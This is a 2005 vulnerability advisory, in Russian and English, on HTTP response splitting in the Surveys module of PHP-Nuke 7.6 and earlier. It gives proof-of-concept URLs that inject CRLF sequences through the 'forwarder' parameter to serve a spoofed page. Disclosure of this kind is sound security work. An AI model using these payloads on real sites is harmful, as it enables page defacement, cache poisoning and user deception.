HTTP response splitting атака в модуле Surveys в PHP-Nuke
 

HTTP response splitting атака в модуле Surveys в PHP-Nuke
Программа: PHP-Nuke 7.6 более ранние версии
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести HTTP response splitting атаку.

Уязвимость существует из-за недостаточной проверки входных данных в переменной forward в модуле Surveys. Удаленный пользователь может использовать эту уязвимость, чтобы подменить содержимое страниц целевого сервера, отравить кеш прокси сервера, произвести XSS нападение.

URL производителя: www.phpnuke.org

Решение: Способов устранения уязвимости не существует в настоящее время.

================================================== ============


Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at
http://www.digitalparadox.org/services.ah

Severity: High
Title: Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below
Date: 15/04/2005

Vendor: Php-Nuke
Vendor Website: http://www.phpnuke.org
Summary: There are, http response splitting vulnerability in php-nuke 7.6 and below.

Proof of Concept Exploits:

MORE DETAILS OF THIS SORT OF BUG CAN BE FOUND AT www.digitalparadox.org/papers.ah

A simple POC can be as follows,

http://localhost/modules.php?name=S...%3Chtml%3EHELLO
I AM VULNERABLE TO HTTP RESPONSE
SPLITTING%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5

A more serious version involving Cross user defacement, cache poisoning and page
hijacking can be,

http://localhost/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3E<title>This
is a spoofed site </title> <body bgcolor=black><font size=10 color=blue> Welcome to my
PHP Nuke Website, This is a spoofed page that you are seeing and can be used for great
evils details about which can be read in http://www.digitalparadox.org/papers.ah Http
Response Splitting by Diabolic Crab. </center> Feel free to contact me about this
vulnerablitiy at dcrab {at} hackerscenter [dot] com<font
color=black>%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(),
mysql_real_escape_string() and other functions for input validation before passing user
input to the mysql database, or before echoing data on the screen, would solve these
problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email:
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding
these vulnerabilities. You can find me at, http://www.hackerscenter.com or
http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with
php.

Diabolic Crab
Web Security, Research & Development
dP Security
email: dcrab@digitalparadox.org
website: http://www.digitalparadox.org

This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure.
If you have received it by mistake please let us know by e-mail
immediately and delete it from your system; should also not copy
the message nor disclose its contents to anyone. Many thanks.